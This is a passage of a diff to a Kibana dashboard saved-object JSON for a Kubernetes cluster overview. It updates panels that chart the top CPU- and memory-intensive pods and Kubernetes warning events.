"f4242bda-ae9c-4d7c-8cda-43f56c38acb5", - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - ], - "columns": { - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.limit.pct: *" - }, - "isBucketed": false, - "label": "Average Pod CPU Usage ", - "operationType": "last_value", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.cpu.usage.limit.pct" - }, - "f4242bda-ae9c-4d7c-8cda-43f56c38acb5": { - "dataType": "string", - "isBucketed": true, - "label": "Top 5 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": true, - "missingBucket": false, - "orderBy": { - "columnId": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "a06a30d5-05f1-46ea-9075-3e6051f5781a", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "9c0b0d2f-c443-4c41-b55c-c7ad0db60302", - "key": "kubernetes.pod.cpu.usage.limit.pct", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.pod.cpu.usage.limit.pct" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - ], - "layerId": "06a776d4-f25a-45c0-a54e-82d0cb913047", - "layerType": "data", - "seriesType": "bar_horizontal", - "xAccessor": "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", - "yConfig": [ - { - "color": "#00bfb3", - "forAccessor": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } - }, - "title": "Cpu Usage per Namespace [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsXY" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "a06a30d5-05f1-46ea-9075-3e6051f5781a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 11, - "i": "14ceb02d-63b6-448a-85fe-28a9e974e80c", - "w": 24, - "x": 0, - "y": 19 - }, - "panelIndex": "14ceb02d-63b6-448a-85fe-28a9e974e80c", - "title": "Top CPU intensive pods", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "9c0b0d2f-c443-4c41-b55c-c7ad0db60302", + "key": "kubernetes.pod.cpu.usage.limit.pct", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.pod.cpu.usage.limit.pct" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + ], + "layerId": "06a776d4-f25a-45c0-a54e-82d0cb913047", + "layerType": "data", + "seriesType": "bar_horizontal", + "xAccessor": "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", + "yConfig": [ + { + "color": "#00bfb3", + "forAccessor": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", - "type": "index-pattern" + "title": "Cpu Usage per Namespace [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Top CPU intensive pods" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "783789d4-8473-40f5-acf0-7ae5c850cd3e", + "w": 24, + "x": 24, + "y": 19 + }, + "panelIndex": "783789d4-8473-40f5-acf0-7ae5c850cd3e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8769bfd6-a9c7-4bab-b048-0e2fcffe8114", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d79e5279-bd92-48b0-bd92-767cf6b8892d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "06a776d4-f25a-45c0-a54e-82d0cb913047": { + "columnOrder": [ + "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + ], + "columns": { + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.memory.usage.limit.pct: *" + }, + "isBucketed": false, + "label": "Average Pod memory Usage ", + "operationType": "last_value", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "8769bfd6-a9c7-4bab-b048-0e2fcffe8114", - "type": "index-pattern" + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.memory.usage.limit.pct" + }, + "f4242bda-ae9c-4d7c-8cda-43f56c38acb5": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": true, + "missingBucket": false, + "orderBy": { + "columnId": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c", + "type": "column" }, - { - "id": "metrics-*", - "name": "d79e5279-bd92-48b0-bd92-767cf6b8892d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "06a776d4-f25a-45c0-a54e-82d0cb913047": { - "columnOrder": [ - "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - ], - "columns": { - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.memory.usage.limit.pct: *" - }, - "isBucketed": false, - "label": "Average Pod memory Usage ", - "operationType": "last_value", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.memory.usage.limit.pct" - }, - "f4242bda-ae9c-4d7c-8cda-43f56c38acb5": { - "dataType": "string", - "isBucketed": true, - "label": "Top 5 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": true, - "missingBucket": false, - "orderBy": { - "columnId": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "8769bfd6-a9c7-4bab-b048-0e2fcffe8114", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d79e5279-bd92-48b0-bd92-767cf6b8892d", - "key": "kubernetes.pod.memory.usage.limit.pct", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.pod.memory.usage.limit.pct" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - ], - "layerId": "06a776d4-f25a-45c0-a54e-82d0cb913047", - "layerType": "data", - "seriesType": "bar_horizontal", - "xAccessor": "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", - "yConfig": [ - { - "color": "#00bfb3", - "forAccessor": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } - }, - "title": "Cpu Usage per Namespace [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsXY" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "8769bfd6-a9c7-4bab-b048-0e2fcffe8114", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 11, - "i": "783789d4-8473-40f5-acf0-7ae5c850cd3e", - "w": 24, - "x": 24, - "y": 19 - }, - "panelIndex": "783789d4-8473-40f5-acf0-7ae5c850cd3e", - "title": "Top memory intensive pods", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d79e5279-bd92-48b0-bd92-767cf6b8892d", + "key": "kubernetes.pod.memory.usage.limit.pct", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.pod.memory.usage.limit.pct" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + ], + "layerId": "06a776d4-f25a-45c0-a54e-82d0cb913047", + "layerType": "data", + "seriesType": "bar_horizontal", + "xAccessor": "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", + "yConfig": [ + { + "color": "#00bfb3", + "forAccessor": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-a69d8e15-2ebf-401c-af12-4b6762f230db", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "086a73a8-ac9d-48eb-b5b7-3c697278cc9e", - "type": "index-pattern" + "title": "Cpu Usage per Namespace [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Top memory intensive pods" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "2525515f-80e7-455f-b88b-53e4abf31cd2", + "w": 24, + "x": 0, + "y": 30 + }, + "panelIndex": "2525515f-80e7-455f-b88b-53e4abf31cd2", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-a69d8e15-2ebf-401c-af12-4b6762f230db", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "086a73a8-ac9d-48eb-b5b7-3c697278cc9e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a69d8e15-2ebf-401c-af12-4b6762f230db": { + "columnOrder": [ + "be5ed114-ba6d-42c6-b8ff-da6142c14a1b", + "b0cd680f-edeb-4934-aceb-6820ad9f01ec", + "b7df21c2-ee65-47cb-9370-294846cfbb65" + ], + "columns": { + "b0cd680f-edeb-4934-aceb-6820ad9f01ec": { + "customLabel": false, + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "b7df21c2-ee65-47cb-9370-294846cfbb65": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.event.metadata.uid: * and kubernetes.event.type : \"Warning\" " + }, + "isBucketed": false, + "label": "New Warnings", + "operationType": "count", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "a69d8e15-2ebf-401c-af12-4b6762f230db": { - "columnOrder": [ - "be5ed114-ba6d-42c6-b8ff-da6142c14a1b", - "b0cd680f-edeb-4934-aceb-6820ad9f01ec", - "b7df21c2-ee65-47cb-9370-294846cfbb65" - ], - "columns": { - "b0cd680f-edeb-4934-aceb-6820ad9f01ec": { - "customLabel": false, - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "b7df21c2-ee65-47cb-9370-294846cfbb65": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.event.metadata.uid: * and kubernetes.event.type : \"Warning\" " - }, - "isBucketed": false, - "label": "New Warnings", - "operationType": "count", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.event.metadata.uid" - }, - "be5ed114-ba6d-42c6-b8ff-da6142c14a1b": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.event.involved_object.uid + 1 other", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "b7df21c2-ee65-47cb-9370-294846cfbb65", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.event.type" - ], - "size": 1000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.event.involved_object.uid" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.event.metadata.uid" + }, + "be5ed114-ba6d-42c6-b8ff-da6142c14a1b": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.event.involved_object.uid + 1 other", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "b7df21c2-ee65-47cb-9370-294846cfbb65", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "086a73a8-ac9d-48eb-b5b7-3c697278cc9e", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.event" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.event" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "Linear", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "b7df21c2-ee65-47cb-9370-294846cfbb65" - ], - "collapseFn": "sum", - "layerId": "a69d8e15-2ebf-401c-af12-4b6762f230db", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "be5ed114-ba6d-42c6-b8ff-da6142c14a1b", - "xAccessor": "b0cd680f-edeb-4934-aceb-6820ad9f01ec", - "yConfig": [ - { - "color": "#fec514", - "forAccessor": "b7df21c2-ee65-47cb-9370-294846cfbb65" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "secondaryFields": [ + "kubernetes.event.type" + ], + "size": 1000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.event.involved_object.uid" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "086a73a8-ac9d-48eb-b5b7-3c697278cc9e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.event" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 11, - "i": "2525515f-80e7-455f-b88b-53e4abf31cd2", - "w": 24, - "x": 0, - "y": 30 - }, - "panelIndex": "2525515f-80e7-455f-b88b-53e4abf31cd2", - "title": "Kubernetes warning events", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b7df21c2-ee65-47cb-9370-294846cfbb65" + ], + "collapseFn": "sum", + "layerId": "a69d8e15-2ebf-401c-af12-4b6762f230db", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "be5ed114-ba6d-42c6-b8ff-da6142c14a1b", + "xAccessor": "b0cd680f-edeb-4934-aceb-6820ad9f01ec", + "yConfig": [ + { + "color": "#fec514", + "forAccessor": "b7df21c2-ee65-47cb-9370-294846cfbb65" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "xTitle": "", + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 11, - "i": "a59fd3c5-5f33-425d-b14e-4713222cc729", - "w": 24, - "x": 24, - "y": 30 - }, - "panelIndex": "a59fd3c5-5f33-425d-b14e-4713222cc729", - "panelRefName": "panel_a59fd3c5-5f33-425d-b14e-4713222cc729", - "title": "Latest Kubernetes warnings", - "type": "search", - "version": "8.6.0-SNAPSHOT" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Cluster Overview", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-12T14:44:58.161Z", - "id": "kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:indexpattern-datasource-layer-c165f898-73a9-48b1-afa9-2b6e75f3cc1f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:indexpattern-datasource-layer-dde29dcf-00ae-4b80-8d9e-ab45c51efba0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:fbaf3405-fab6-4f09-883d-45368cf97670", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a91d36c0-f405-4c04-8510-11134bd259f0:indexpattern-datasource-layer-dfd1702f-213e-4fa2-98e3-5106657c62e7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a91d36c0-f405-4c04-8510-11134bd259f0:indexpattern-datasource-layer-dff09473-7596-48c7-bbf4-beccee70d845", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a91d36c0-f405-4c04-8510-11134bd259f0:21cde57c-0e69-4e4c-b3e9-659de2778d06", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64dd7c4e-b503-4cc4-8c61-e17c52204b54:indexpattern-datasource-layer-2ca9773d-0221-478b-b8bc-90bb8d439f33", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64dd7c4e-b503-4cc4-8c61-e17c52204b54:5c81359c-376d-41bd-984d-60fb106f2e33", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:a06a30d5-05f1-46ea-9075-3e6051f5781a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:9c0b0d2f-c443-4c41-b55c-c7ad0db60302", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:8769bfd6-a9c7-4bab-b048-0e2fcffe8114", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:d79e5279-bd92-48b0-bd92-767cf6b8892d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2525515f-80e7-455f-b88b-53e4abf31cd2:indexpattern-datasource-layer-a69d8e15-2ebf-401c-af12-4b6762f230db", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2525515f-80e7-455f-b88b-53e4abf31cd2:086a73a8-ac9d-48eb-b5b7-3c697278cc9e", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "kubernetes-ee55101a-9f62-44da-b64c-ffa1eb5abad8", - "name": "a59fd3c5-5f33-425d-b14e-4713222cc729:panel_a59fd3c5-5f33-425d-b14e-4713222cc729", - "type": "search" + "title": "Kubernetes warning events" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "columns": [ + "kubernetes.event.type", + "kubernetes.event.reason", + "kubernetes.event.involved_object.name" + ], + "description": "Kubernetes Warnings", + "grid": { + "columns": { + "kubernetes.event.involved_object.kind": { + "width": 198.30555555555554 + }, + "kubernetes.event.metadata.namespace": { + "width": 249.83333333333337 + }, + "kubernetes.event.reason": { + "width": 176.33333333333331 + }, + "kubernetes.event.type": { + "width": 156.91666666666663 + } + } + }, + "hideChart": false, + "isTextBasedQuery": false, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"kubernetes.event.type\",\"negate\":false,\"params\":{\"query\":\"Warning\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"kubernetes.event.type\":\"Warning\"}}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset :\\\"kubernetes.event\\\" \"}}" + }, + "rowHeight": -1, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "timeRestore": false, + "title": "Kubernetes Warnings", + "usesAdHocDataView": false, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, - { - "id": "metrics-*", - "name": "controlGroup_748291db-2826-4242-9107-9a5226733a06:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 11, + "i": "a59fd3c5-5f33-425d-b14e-4713222cc729", + "w": 24, + "x": 24, + "y": 30 }, - { - "id": "metrics-*", - "name": "controlGroup_2da8af79-7928-4741-8d03-866642f3c2a0:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "a59fd3c5-5f33-425d-b14e-4713222cc729", + "title": "Latest Kubernetes warnings", + "type": "search", + "version": "8.0.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] Cluster Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:indexpattern-datasource-layer-c165f898-73a9-48b1-afa9-2b6e75f3cc1f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:indexpattern-datasource-layer-dde29dcf-00ae-4b80-8d9e-ab45c51efba0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:fbaf3405-fab6-4f09-883d-45368cf97670", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a91d36c0-f405-4c04-8510-11134bd259f0:indexpattern-datasource-layer-dfd1702f-213e-4fa2-98e3-5106657c62e7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a91d36c0-f405-4c04-8510-11134bd259f0:indexpattern-datasource-layer-dff09473-7596-48c7-bbf4-beccee70d845", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a91d36c0-f405-4c04-8510-11134bd259f0:21cde57c-0e69-4e4c-b3e9-659de2778d06", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64dd7c4e-b503-4cc4-8c61-e17c52204b54:indexpattern-datasource-layer-2ca9773d-0221-478b-b8bc-90bb8d439f33", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64dd7c4e-b503-4cc4-8c61-e17c52204b54:5c81359c-376d-41bd-984d-60fb106f2e33", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:a06a30d5-05f1-46ea-9075-3e6051f5781a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:9c0b0d2f-c443-4c41-b55c-c7ad0db60302", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 